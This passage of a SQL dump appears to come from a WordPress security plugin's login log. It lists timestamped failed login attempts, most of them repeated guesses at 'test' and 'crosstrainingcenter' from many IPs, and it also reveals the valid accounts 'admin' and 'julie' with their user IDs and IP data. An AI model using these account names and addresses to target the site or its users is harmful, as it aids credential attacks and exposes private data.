(103575, 1499818506.534426, 1, 'loginFailInvalidUsername', 'test', 0, 1849084337, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103576, 1499820446.049304, 1, 'loginFailInvalidUsername', 'test', 0, 1326228420, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103577, 1499821021.726881, 1, 'loginFailInvalidUsername', 'test', 0, 3032431876, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103578, 1499821024.561135, 1, 'loginFailInvalidUsername', 'test', 0, 3032431873, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103579, 1499822009.338055, 1, 'loginFailInvalidUsername', 'test', 0, 2958474165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103580, 1499822010.311134, 1, 'loginFailInvalidUsername', 'test', 0, 2958474165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103581, 1499822221.615408, 1, 'loginFailInvalidUsername', 'test', 0, 1571300011, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103582, 1499822226.894081, 1, 'loginFailInvalidUsername', 'test', 0, 1571300011, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103583, 1499822750.253533, 1, 'loginFailInvalidUsername', 'test', 0, 387737736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103584, 1499822751.411047, 1, 'loginFailInvalidUsername', 'test', 0, 387737736, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103585, 1499823116.808367, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_29_76) AppleWebKit/531.70.17 (KHTML, like Gecko) Chrome/55.1.6919.1647 Safari/532.00 Edge/36.04683'),
(103586, 1499825134.648892, 1, 'loginFailInvalidUsername', 'test', 0, 831556195, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103587, 1499825139.873154, 1, 'loginFailInvalidUsername', 'test', 0, 831556195, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103588, 1499828071.649648, 1, 'loginFailInvalidUsername', 'test', 0, 1733481319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103589, 1499828072.938333, 1, 'loginFailInvalidUsername', 'test', 0, 1733481319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103590, 1499831090.235827, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(103591, 1499831338.633273, 1, 'loginFailInvalidUsername', 'test', 0, 1483647016, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103592, 1499831339.633050, 1, 'loginFailInvalidUsername', 'test', 0, 1483647016, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103593, 1499833893.824226, 1, 'loginFailInvalidUsername', 'test', 0, 3004856574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103594, 1499833895.262212, 1, 'loginFailInvalidUsername', 'test', 0, 3004856574, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103595, 1499836517.835034, 1, 'loginFailInvalidUsername', 'test', 0, 1001097570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103596, 1499836519.552728, 1, 'loginFailInvalidUsername', 'test', 0, 1001097570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103597, 1499838078.522391, 1, 'loginFailInvalidUsername', 'test', 0, 2985722518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103598, 1499838079.780637, 1, 'loginFailInvalidUsername', 'test', 0, 2985722518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103599, 1499840780.305566, 1, 'loginFailInvalidUsername', 'test', 0, 2946418965, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103600, 1499840781.936563, 1, 'loginFailInvalidUsername', 'test', 0, 2946418965, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103601, 1499842110.023586, 1, 'loginFailInvalidUsername', 'test', 0, 1279792599, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103602, 1499842111.219474, 1, 'loginFailInvalidUsername', 'test', 0, 1279792599, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103603, 1499843314.675465, 1, 'loginFailInvalidUsername', 'test', 0, 2049707949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103604, 1499843316.305951, 1, 'loginFailInvalidUsername', 'test', 0, 2049707949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103605, 1499847783.899889, 1, 'loginFailInvalidUsername', 'test', 0, 246024145, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103606, 1499847785.583786, 1, 'loginFailInvalidUsername', 'test', 0, 246024145, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103607, 1499848725.596640, 1, 'loginFailInvalidUsername', 'test', 0, 1410977262, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103608, 1499848726.596772, 1, 'loginFailInvalidUsername', 'test', 0, 1410977262, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103609, 1499851728.637281, 1, 'loginFailInvalidUsername', 'test', 0, 2945210445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103610, 1499851730.120717, 1, 'loginFailInvalidUsername', 'test', 0, 2945210445, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103611, 1499853773.640185, 1, 'loginFailInvalidUsername', 'test', 0, 1471709157, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103612, 1499858452.108718, 1, 'loginFailInvalidUsername', 'test', 0, 1790266524, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103613, 1499858453.847605, 1, 'loginFailInvalidUsername', 'test', 0, 1790266524, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103614, 1499858472.668166, 1, 'loginFailInvalidUsername', 'test', 0, 702705461, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103615, 1499858474.138911, 1, 'loginFailInvalidUsername', 'test', 0, 702705461, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103616, 1499858929.106350, 1, 'loginFailInvalidUsername', 'test', 0, 462663250, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103617, 1499858930.833816, 1, 'loginFailInvalidUsername', 'test', 0, 462663250, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103618, 1499860261.144659, 1, 'loginFailInvalidUsername', 'test', 0, 1374395776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103619, 1499860262.151838, 1, 'loginFailInvalidUsername', 'test', 0, 1374395776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103620, 1499860981.064281, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2047075655, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103621, 1499860984.060613, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2047075655, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103622, 1499862779.106898, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835497269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103623, 1499862780.320058, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835497269, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103624, 1499862932.750104, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657631490, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103625, 1499862934.164266, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657631490, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103626, 1499863086.100158, 1, 'loginFailValidUsername', 'crosstrainingcenter', 0, 2087197149, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103627, 1499863087.820538, 1, 'loginFailValidUsername', 'crosstrainingcenter', 0, 2087197149, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103628, 1499863503.225581, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1731811175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103629, 1499863504.700259, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1731811175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103630, 1499863919.210607, 1, 'loginFailInvalidUsername', 'test', 0, 1146224722, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103631, 1499863925.181248, 1, 'loginFailInvalidUsername', 'test', 0, 1146224722, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103632, 1499864423.382340, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1540340196, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103633, 1499864424.445407, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1540340196, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103634, 1499864437.116502, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 28976514, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103635, 1499864438.346757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 28976514, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103636, 1499866196.062661, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3200394026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103637, 1499866197.539589, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3200394026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103638, 1499866427.948893, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1324384782, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103639, 1499866428.940750, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1324384782, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103640, 1499867460.350649, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 692435087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103641, 1499867462.188414, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 692435087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103642, 1499868369.593558, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2393026044, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103643, 1499869350.013377, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/532.86.33 (KHTML, like Gecko) Version/5.3.8 Safari/530.79'),
(103644, 1499869653.711238, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2107664388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103645, 1499869656.030359, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2107664388, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103646, 1499869794.274344, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3314816916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103647, 1499869796.171172, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3314816916, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103648, 1499870179.417696, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1484376590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103649, 1499870180.452938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1484376590, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103650, 1499870351.298593, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887825197, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103651, 1499870352.579074, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887825197, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103652, 1499870809.873735, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2047867266, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103653, 1499870811.239964, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2047867266, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103654, 1499874156.167443, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1515795123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103655, 1499874157.200815, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1515795123, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103656, 1499875353.288018, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1438314759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103657, 1499875354.343792, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1438314759, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(103658, 1499880894.341714, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892040430, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103659, 1499880895.924837, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892040430, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103660, 1499883261.670732, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892535184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103661, 1499883263.344405, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1892535184, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103662, 1499885306.055557, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3743315258, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103663, 1499885307.430949, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3743315258, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103664, 1499886151.637327, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1369719043, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103665, 1499886152.597826, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1369719043, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103666, 1499886809.413031, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2152704098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103667, 1499889441.777647, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3257560762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103668, 1499889442.800711, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3257560762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103669, 1499890032.220772, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 42616701, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103670, 1499891816.743273, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2630978203, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103671, 1499891818.215973, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2630978203, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103672, 1499893718.476328, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2538321431, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103673, 1499893719.617076, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2538321431, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103674, 1499894286.437594, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 701157129, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103675, 1499894287.687060, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 701157129, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103676, 1499896209.933849, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1731616924, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103677, 1499896211.262627, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1731616924, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103678, 1499897583.187622, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979958751, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103679, 1499897584.505255, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979958751, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103680, 1499899199.807108, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1276281314, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103681, 1499899200.975096, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1276281314, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103682, 1499900485.023053, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1581302042, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103683, 1499901182.561065, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3308322317, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103684, 1499901183.666718, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3308322317, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103685, 1499901611.902906, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 704499487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103686, 1499901613.101013, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 704499487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103687, 1499905492.936915, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 415247450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103688, 1499905494.548782, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 415247450, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103689, 1499912623.327728, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1586182716, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103690, 1499912624.384314, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1586182716, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103691, 1499915435.813856, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694778652, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103692, 1499915436.879455, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694778652, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103693, 1499918110.482032, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/534.04.57 (KHTML, like Gecko) Version/4.6.1 Safari/532.21'),
(103694, 1499918354.538919, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1235952074, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103695, 1499924165.260509, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3472852924, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103696, 1499924166.979789, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3472852924, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103697, 1499925680.181082, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3018378221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103698, 1499925681.611082, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3018378221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103699, 1499930541.989623, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742045941, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103700, 1499930543.970217, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1742045941, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103701, 1499931767.493728, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 703760406, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103702, 1499931768.733205, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 703760406, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103703, 1499933253.242091, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1403381105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103704, 1499933254.208737, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1403381105, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103705, 1499936771.151949, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979315283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103706, 1499936772.526032, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979315283, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103707, 1499937294.202643, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(103708, 1499941054.761689, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3377866446, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103709, 1499941056.247584, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3377866446, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103710, 1499942583.592554, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2996127776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103711, 1499942584.635828, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2996127776, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103712, 1499945447.096568, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1467268581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103713, 1499945448.137289, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1467268581, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103714, 1499950981.875605, 1, 'loginFailValidUsername', 'julie', 2, 915750734, ''),
(103715, 1499954893.329745, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781731758, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103716, 1499954894.609899, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781731758, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103717, 1499955004.993854, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3536058233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103718, 1499955006.639849, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3536058233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
